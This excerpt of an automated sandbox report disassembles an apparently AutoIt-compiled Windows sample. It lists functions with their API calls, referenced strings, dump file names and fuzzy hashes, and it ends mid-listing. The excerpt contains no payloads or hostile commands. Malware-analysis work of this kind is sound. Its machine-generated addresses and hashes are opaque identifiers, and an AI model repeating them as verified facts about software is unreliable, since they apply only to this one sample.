Part of subcall function 00C30957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00C16B0C,?,00008000), ref: 00C30973

Part of subcall function 00C14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C14743,?,?,00C137AE,?), ref: 00C14770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C16BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00C16CFA

Part of subcall function 00C1586D: _wcscpy.LIBCMT ref: 00C158A5

Part of subcall function 00C3363D: _iswctype.LIBCMT ref: 00C33645

Strings

Error opening the file, xrefs: 00C4E43D, 00C4E4B8
>>>AUTOIT SCRIPT<<<, xrefs: 00C4E496
Unterminated string, xrefs: 00C4E7E4
EA06, xrefs: 00C4E452
AU3!, xrefs: 00C16B61
Bad directive syntax error, xrefs: 00C4E79D
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00C4E421

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 92effe85c4cc9ee5ba120fdf4f578e81a8b051245235879a41cd0ed60b9d5e1c
Instruction ID: 8e03579baae72e751186d7be0b9030478015f9d9a5853ef44a953ca8b163d892
Opcode Fuzzy Hash: 92effe85c4cc9ee5ba120fdf4f578e81a8b051245235879a41cd0ed60b9d5e1c
Instruction Fuzzy Hash: 79029D31108340DFC724EF24C891AAFBBE5BF96314F14491DF49A972A1DB30DA89EB52

Function 00C72D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C72D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00C72DDD
GetMenuItemCount.USER32(00CD5890), ref: 00C72E66
DeleteMenu.USER32(00CD5890,00000005,00000000,000000F5,?,?), ref: 00C72EF6
DeleteMenu.USER32(00CD5890,00000004,00000000), ref: 00C72EFE
DeleteMenu.USER32(00CD5890,00000006,00000000), ref: 00C72F06
DeleteMenu.USER32(00CD5890,00000003,00000000), ref: 00C72F0E
GetMenuItemCount.USER32(00CD5890), ref: 00C72F16
SetMenuItemInfoW.USER32(00CD5890,00000004,00000000,00000030), ref: 00C72F4C
GetCursorPos.USER32(?), ref: 00C72F56
SetForegroundWindow.USER32(00000000), ref: 00C72F5F
TrackPopupMenuEx.USER32(00CD5890,00000000,?,00000000,00000000,00000000), ref: 00C72F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C72F7E

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 65381c4ccba23341be23c5a06cc134d952bc476d79eb7db99935d76efaa9b6d6
Instruction ID: bee0439f3b1fffa3585930cbbcf2ad905746837485c977a7d591f47919040f98
Opcode Fuzzy Hash: 65381c4ccba23341be23c5a06cc134d952bc476d79eb7db99935d76efaa9b6d6
Instruction Fuzzy Hash: 8E71D470600215BFEB318F55DC89FAABF64FF04764F10822AF629A61E1C7715D60DBA0

Function 00C677DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06

_memset.LIBCMT ref: 00C6786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C678A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C678BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C678D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C67902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00C6792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C67935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C6793A

Strings

\IPC$, xrefs: 00C67882
SOFTWARE\Classes\, xrefs: 00C6780C
\CLSID, xrefs: 00C67822

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 60d53afa4147e525b8d4755eea43fce1ceb1ab5fc9a1dadf2bd52ddc738eb7d7
Instruction ID: 091493d106d7d212e67a6f3d32bfdeea64da81a29cba2ef9dd5bc7abcdaa7165
Opcode Fuzzy Hash: 60d53afa4147e525b8d4755eea43fce1ceb1ab5fc9a1dadf2bd52ddc738eb7d7
Instruction Fuzzy Hash: DF41087281422DABCF21EBA4DC95EEDB7B8FF04354F044629F915A31A1EA309E45DB90

Function 00C6F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C4E2A0,00000010,?,Bad directive syntax error,00C9F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C6F7C2
LoadStringW.USER32(00000000,?,00C4E2A0,00000010), ref: 00C6F7C9

Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22

_wprintf.LIBCMT ref: 00C6F7FC
__swprintf.LIBCMT ref: 00C6F81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C6F88D

Strings

Line %d:, xrefs: 00C6F818
%s (%d) : ==> %s.: %s %s, xrefs: 00C6F7F7
Error: , xrefs: 00C6F85B
Line %d (File "%s"):, xrefs: 00C6F833
., xrefs: 00C6F873

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: e3737f29621f02176610b3fb95bd8451250ae47effe85acc9a27fcf9ff8bf8ee
Instruction ID: 2c624883681fa162e9e781e3c11593e19e04a66c20876bfb666a33fc2b5315a8
Opcode Fuzzy Hash: e3737f29621f02176610b3fb95bd8451250ae47effe85acc9a27fcf9ff8bf8ee
Instruction Fuzzy Hash: 05219E3290421EEFCF11EF90CC5AFEE7778BF19300F04086AF515660A2EA319669EB50

Function 00C752C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06

Part of subcall function 00C17924: _memmove.LIBCMT ref: 00C179AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C75330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C75346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C75357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C75369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C7537A

Strings

status PlayMe mode, xrefs: 00C7532B
open , xrefs: 00C752DF
play PlayMe, xrefs: 00C75375
alias PlayMe, xrefs: 00C75309
play PlayMe wait, xrefs: 00C75364
close PlayMe, xrefs: 00C75341, 00C7536E

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 1267b417b9cbe6784df8350da831cff1f61e939f1403a3897074a712760f9781
Instruction ID: 98c0c376f702c8d27c6fb731aa66888bbba5f710dc8d9b317da976b6c3af148a
Opcode Fuzzy Hash: 1267b417b9cbe6784df8350da831cff1f61e939f1403a3897074a712760f9781
Instruction Fuzzy Hash: AF119431A5012979D720B771CC5AEFF7B7CEBD2B90F00092DB415A20E1EEA04D49D6B0

Function 00C746B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00C746D2
gethostname.WSOCK32(?,00000100), ref: 00C746EC
gethostbyname.WSOCK32(?), ref: 00C746F9
_wcscpy.LIBCMT ref: 00C74721
_memmove.LIBCMT ref: 00C74734
inet_ntoa.WSOCK32(?), ref: 00C7473F
_strcat.LIBCMT ref: 00C7474D
_wcscpy.LIBCMT ref: 00C74764
WSACleanup.WSOCK32 ref: 00C74772
_wcscpy.LIBCMT ref: 00C74780

Strings

0.0.0.0, xrefs: 00C7471B

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: fb108f504fdf258ed62fe39fa9a9a382c4c25e98a0acfe9f2235b874178c300e
Instruction ID: df259518ed2084f8b985dcd7bff1108c203c8a74bf21be026e02a9f46e23f96f
Opcode Fuzzy Hash: fb108f504fdf258ed62fe39fa9a9a382c4c25e98a0acfe9f2235b874178c300e
Instruction Fuzzy Hash: 9011E731600114AFCB28AB709C4AFDE77BCEF02711F0441BAF449D60A1EF719E82DA50

Function 00C74F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00C74F7A

Part of subcall function 00C3049F: timeGetTime.WINMM(?,75A8B400,00C20E7B), ref: 00C304A3

Sleep.KERNEL32(0000000A), ref: 00C74FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00C74FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C74FEC
SetActiveWindow.USER32 ref: 00C7500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C75019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00C75038
Sleep.KERNEL32(000000FA), ref: 00C75043
IsWindow.USER32 ref: 00C7504F
EndDialog.USER32(00000000), ref: 00C75060

Strings

BUTTON, xrefs: 00C74FDE

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 3604de9101bce16476e267fbb483d5a0530b71354f1a8519bfa689fab86ab46d
Instruction ID: ca30698cce84be88c078b28d7a31f864a41dbbe7aefd1a23a9d131181456fbb6
Opcode Fuzzy Hash: 3604de9101bce16476e267fbb483d5a0530b71354f1a8519bfa689fab86ab46d
Instruction Fuzzy Hash: EA21AC74606605AFE7105F70FC8CB2E3B69EB08745F14902BF119C21B9EBB58E91DB62

Function 00C7D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC

CoInitialize.OLE32(00000000), ref: 00C7D5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C7D67D
SHGetDesktopFolder.SHELL32(?), ref: 00C7D691
CoCreateInstance.OLE32(00CA2D7C,00000000,00000001,00CC8C1C,?), ref: 00C7D6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C7D74C
CoTaskMemFree.OLE32(?,?), ref: 00C7D7A4
_memset.LIBCMT ref: 00C7D7E1
SHBrowseForFolderW.SHELL32(?), ref: 00C7D81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C7D840
CoTaskMemFree.OLE32(00000000), ref: 00C7D847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00C7D87E
CoUninitialize.OLE32(00000001,00000000), ref: 00C7D880

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 53d4a3f2ff0178f8bc772368d583b9c1d3e7556a7f104f7c657c5c2a1e1f3b1e
Instruction ID: 44c2840727646ebb5c39b77c4ca37eb4a68ac18212ed2e552abf3352f658aac1
Opcode Fuzzy Hash: 53d4a3f2ff0178f8bc772368d583b9c1d3e7556a7f104f7c657c5c2a1e1f3b1e
Instruction Fuzzy Hash: E3B10F75A00109AFDB04DF64C888EAEBBB9FF49314F148469F90AEB251DB30EE45DB50

Function 00C6C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00C6C283
GetWindowRect.USER32(00000000,?), ref: 00C6C295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C6C2F3
GetDlgItem.USER32(?,00000002), ref: 00C6C2FE
GetWindowRect.USER32(00000000,?), ref: 00C6C310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C6C364
GetDlgItem.USER32(?,000003E9), ref: 00C6C372
GetWindowRect.USER32(00000000,?), ref: 00C6C383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C6C3C6
GetDlgItem.USER32(?,000003EA), ref: 00C6C3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C6C3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 00C6C3FE

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: a5172204bbe8b1f61bda8538a9f0d255c38f7c9b3e9928ec7e74e3d1b7179ae5
Instruction ID: 82f504fec960139547a6b606f787f5e1bb495d80a729cbe3ad4a40b37fe0b607
Opcode Fuzzy Hash: a5172204bbe8b1f61bda8538a9f0d255c38f7c9b3e9928ec7e74e3d1b7179ae5
Instruction Fuzzy Hash: 54510D71B00205AFDB18CFA9DD99BBEBBBAEB88711F14813DF515D62A0D7709E418B10

Function 00C1201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00C11B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C12036,?,00000000,?,?,?,?,00C116CB,00000000,?), ref: 00C11B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00C120D3
KillTimer.USER32(-00000001,?,?,?,?,00C116CB,00000000,?,?,00C11AE2,?,?), ref: 00C1216E
DestroyAcceleratorTable.USER32(00000000), ref: 00C4BCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C116CB,00000000,?,?,00C11AE2,?,?), ref: 00C4BCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C116CB,00000000,?,?,00C11AE2,?,?), ref: 00C4BCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C116CB,00000000,?,?,00C11AE2,?,?), ref: 00C4BD0A
DeleteObject.GDI32(00000000), ref: 00C4BD1C

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 715fa9269b68a9156ad69f365eb36e9cadaaaa4f1241848e88e9628df2cd3b98
Instruction ID: 24f79d6f68c319f62b6e8cd6432ac928e95babac0462a13d0fa32d95f7bee595
Opcode Fuzzy Hash: 715fa9269b68a9156ad69f365eb36e9cadaaaa4f1241848e88e9628df2cd3b98
Instruction Fuzzy Hash: 6A619B34501A00DFCB359F15DD88B69B7F2FB45312F20856EE5528AAA4C770ADA1FB80

Function 00C121A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00C125DB: GetWindowLongW.USER32(?,000000EB), ref: 00C125EC

GetSysColor.USER32(0000000F), ref: 00C121D3

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 0f5a5100391e214a41a6ed6bba0a954dd5240204ce46844e49e14e61be8f14bf
Instruction ID: 85a49d7e060e94c0bea44fd2aa3933d770899632d10ff960970d089abf637bf8
Opcode Fuzzy Hash: 0f5a5100391e214a41a6ed6bba0a954dd5240204ce46844e49e14e61be8f14bf
Instruction Fuzzy Hash: C2418F35100140EBDB255F28EC88BFD3B65EB47331F28426AFE658A1E5C7318D92EB61

Function 00C7A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00C9F910), ref: 00C7A90B
GetDriveTypeW.KERNEL32(00000061,00CC89A0,00000061), ref: 00C7A9D5
_wcscpy.LIBCMT ref: 00C7A9FF

Strings

cdrom, xrefs: 00C7A927
removable, xrefs: 00C7A93D
all, xrefs: 00C7A911
fixed, xrefs: 00C7A953
network, xrefs: 00C7A969
ramdisk, xrefs: 00C7A97F
unknown, xrefs: 00C7A996

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 311cf33a15cfc07324f84884da4605c7eccf3236122ef4b6f88240f7c3a6ddba
Instruction ID: ca95541d658f73b23627103ebd55a48fe4c487ad4d4c735071c4787c610e3743
Opcode Fuzzy Hash: 311cf33a15cfc07324f84884da4605c7eccf3236122ef4b6f88240f7c3a6ddba
Instruction Fuzzy Hash: 8751AE311183019BC704EF14D8A2AAFB7A5EFC5710F14882DF59A972A2DB31DA49EB53

Function 00C19837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00C19862
__swprintf.LIBCMT ref: 00C198AC
__i64tow.LIBCMT ref: 00C4F5E6

Strings

%.15g, xrefs: 00C198A6
0x%p, xrefs: 00C4F5C8
False, xrefs: 00C4F5AE
True, xrefs: 00C4F5A7

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: ea59a2f2efd1a7f79f552cb317388d034e80b13174321bfa2a7fd060156a199c
Instruction ID: 90a6e7e6cf254e6cfe04e144b4a681ba34e2067811ab712a96235cc840c984a0
Opcode Fuzzy Hash: ea59a2f2efd1a7f79f552cb317388d034e80b13174321bfa2a7fd060156a199c
Instruction Fuzzy Hash: BA41E671510205AFEB24DF35D852EBAB7F8FF46300F20447EE559D7291EA319A42EB10

Function 00C97152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C9716A
CreateMenu.USER32 ref: 00C97185
SetMenu.USER32(?,00000000), ref: 00C97194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C97221
IsMenu.USER32(?), ref: 00C97237
